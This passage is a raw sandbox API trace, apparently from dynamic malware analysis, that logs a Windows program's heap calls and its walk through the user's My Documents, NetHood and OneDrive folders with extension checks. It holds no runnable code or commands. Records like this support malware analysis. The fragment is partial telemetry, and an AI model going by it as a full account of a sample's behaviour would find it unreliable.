0x2ac3dd0 [0189.930] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.930] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40318 | out: hHeap=0x2c0000) returned 1 [0189.930] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40318 [0189.930] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.931] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.931] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40318 | out: hHeap=0x2c0000) returned 1 [0189.931] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40318 [0189.931] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0189.931] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40318 | out: hHeap=0x2c0000) returned 1 [0189.932] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40318 [0189.932] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0189.932] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0189.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0189.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40318 | out: hHeap=0x2c0000) returned 1 [0189.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40318 [0189.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40318 | out: hHeap=0x2c0000) returned 1 [0189.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40318 [0189.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0189.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40318 | out: hHeap=0x2c0000) returned 1 [0189.934] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40318 [0189.934] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0189.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.935] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40318 | out: hHeap=0x2c0000) returned 1 [0189.935] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40318 [0189.935] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.935] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.935] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40318 | out: hHeap=0x2c0000) returned 1 [0189.935] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40318 [0189.935] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.935] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.936] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40318 | out: hHeap=0x2c0000) returned 1 [0189.936] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40318 [0189.936] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0189.936] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0189.936] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.937] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0189.937] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40318 | out: hHeap=0x2c0000) returned 1 [0189.937] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40318 [0189.937] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0189.937] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.938] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40318 | out: hHeap=0x2c0000) returned 1 [0189.938] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40318 [0189.938] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0189.938] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.938] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40318 | out: hHeap=0x2c0000) returned 1 [0189.938] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40318 [0189.938] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0189.939] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.939] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40318 | out: hHeap=0x2c0000) returned 1 [0189.939] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40318 [0189.939] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0189.939] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.940] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40318 | out: hHeap=0x2c0000) returned 1 [0189.940] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40318 [0189.940] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.940] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.940] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40318 | out: hHeap=0x2c0000) returned 1 [0189.940] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40318 [0189.940] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.941] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.941] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40318 | out: hHeap=0x2c0000) returned 1 [0189.941] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40318 [0189.941] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\My Documents\\") returned="My Documents\\" [0189.941] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0189.941] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0189.941] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40318 | out: hHeap=0x2c0000) returned 1 [0189.941] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0189.941] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0189.942] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0189.942] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0189.942] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0189.942] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0189.942] PathFindFileNameW (pszPath="") returned="" [0189.942] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40318 [0189.942] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\My Documents\\*" (normalized: "c:\\users\\keecfmwgj\\my documents\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe8785c10, ftCreationTime.dwHighDateTime=0x1d89766, ftLastAccessTime.dwLowDateTime=0x387011e0, ftLastAccessTime.dwHighDateTime=0x1d898de, ftLastWriteTime.dwLowDateTime=0x387011e0, ftLastWriteTime.dwHighDateTime=0x1d898de, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="j ucK2lALp_iPp", cAlternateFileName="JUCK2L~1")) returned 0xffffffff [0189.943] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40318 | out: hHeap=0x2c0000) returned 1 [0189.944] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0189.944] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40108 | out: hHeap=0x2c0000) returned 1 [0189.944] PeekMessageW (in: lpMsg=0x2f9ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9ff08) returned 0 [0189.944] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0189.944] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\NetHood\\") returned="NetHood\\" [0189.944] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0189.944] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0189.944] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0189.944] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0189.944] PathFindFileNameW (pszPath="") returned="" [0189.944] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\NetHood\\*" (normalized: "c:\\users\\keecfmwgj\\nethood\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe8785c10, ftCreationTime.dwHighDateTime=0x1d89766, ftLastAccessTime.dwLowDateTime=0x387011e0, ftLastAccessTime.dwHighDateTime=0x1d898de, ftLastWriteTime.dwLowDateTime=0x387011e0, ftLastWriteTime.dwHighDateTime=0x1d898de, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="j ucK2lALp_iPp", cAlternateFileName="JUCK2L~1")) returned 0xffffffff [0189.945] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x301078 | out: hHeap=0x2c0000) returned 1 [0189.945] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0189.945] PeekMessageW (in: lpMsg=0x2f9ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9ff08) returned 0 [0189.945] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0189.945] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\OneDrive\\") returned="OneDrive\\" [0189.945] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0189.945] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0189.945] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0189.945] PathFindFileNameW (pszPath="") returned="" [0189.945] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\OneDrive\\*" (normalized: "c:\\users\\keecfmwgj\\onedrive\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xf29f86d0, ftCreationTime.dwHighDateTime=0x1d70911, ftLastAccessTime.dwLowDateTime=0xf2a44990, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf2a44990, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0189.945] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xf29f86d0, ftCreationTime.dwHighDateTime=0x1d70911, ftLastAccessTime.dwLowDateTime=0xf2a44990, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf2a44990, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0189.946] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0xf2a44990, ftCreationTime.dwHighDateTime=0x1d70911, ftLastAccessTime.dwLowDateTime=0xf2a44990, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf2a44990, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x64, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0189.946] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\OneDrive\\desktop.ini") returned=".ini" [0189.946] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0xf2a44990, ftCreationTime.dwHighDateTime=0x1d70911, ftLastAccessTime.dwLowDateTime=0xf2a44990, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf2a44990, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x64, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0189.946] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0189.946] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0189.946] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c60 | out: hHeap=0x2c0000) returned 1 [0189.946] PeekMessageW (in: lpMsg=0x2f9ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9ff08) returned 0 [0189.946] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c60 [0189.946] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0189.946] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x301078 [0189.946] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.947] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.947] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x301078 | out: hHeap=0x2c0000) returned 1 [0189.947] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x301078 [0189.947] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0189.948] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.949] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x301078 | out: hHeap=0x2c0000) returned 1 [0189.949] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x301078 [0189.949] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0189.949] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.949] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x301078 | out: hHeap=0x2c0000) returned 1 [0189.949] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x301078 [0189.950] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0189.950] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.950] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x301078 | out: hHeap=0x2c0000) returned 1 [0189.950] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x301078 [0189.950] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0189.951] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.951] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x301078 | out: hHeap=0x2c0000) returned 1 [0189.951] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x301078 [0189.951] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0189.952] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.952] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x301078 | out: hHeap=0x2c0000) returned 1 [0189.952] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x301078 [0189.952] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.952] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0189.952] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.953] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0189.953] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x301078 | out: hHeap=0x2c0000) returned 1 [0189.953] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x301078 [0189.953] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.953] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.954] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x301078 | out: hHeap=0x2c0000) returned 1 [0189.954] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x301078 [0189.954] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0189.954] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.954] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x301078 | out: hHeap=0x2c0000) returned 1 [0189.954] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x301078 [0189.954] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0189.955] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.955] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x301078 | out: hHeap=0x2c0000) returned 1 [0189.955] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x301078 [0189.955] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0189.955] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.956] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x301078 | out: hHeap=0x2c0000) returned 1 [0189.956] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x301078 [0189.956] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.956] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.956] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x301078 | out: hHeap=0x2c0000) returned 1 [0189.956] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x301078 [0189.956] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.957] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.957] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x301078 | out: hHeap=0x2c0000) returned 1 [0189.957] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x301078 [0189.957] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0189.957] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.958] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x301078 | out: hHeap=0x2c0000) returned 1 [0189.958] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x301078 [0189.958] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0189.958] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.958] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x301078 | out: hHeap=0x2c0000) returned 1 [0189.958] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x301078 [0189.959] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0189.959] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.959] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x301078 | out: hHeap=0x2c0000) returned 1 [0189.959] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x301078 [0189.959] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0189.960] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.960] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x301078 | out: hHeap=0x2c0000) returned 1 [0189.960] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x301078 [0189.960] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0189.961] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.961] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x301078 | out: hHeap=0x2c0000) returned 1 [0189.961] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x301078 [0189.961] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.961] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.962] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x301078 | out: hHeap=0x2c0000) returned 1 [0189.962] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x301078 [0189.962] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.962] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.962] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x301078 | out: hHeap=0x2c0000) returned 1 [0189.962] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x301078 [0189.962] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.963] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.963] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x301078 | out: hHeap=0x2c0000) returned 1 [0189.963] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x301078 [0189.963] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0189.963] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.964] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x301078 | out: hHeap=0x2c0000) returned 1 [0189.964] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x301078 [0189.964] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0189.964] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0189.964] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.964] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0189.965] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x301078 | out: hHeap=0x2c0000) returned 1 [0189.965] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x301078 [0189.965] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.965] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.965] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x301078 | out: 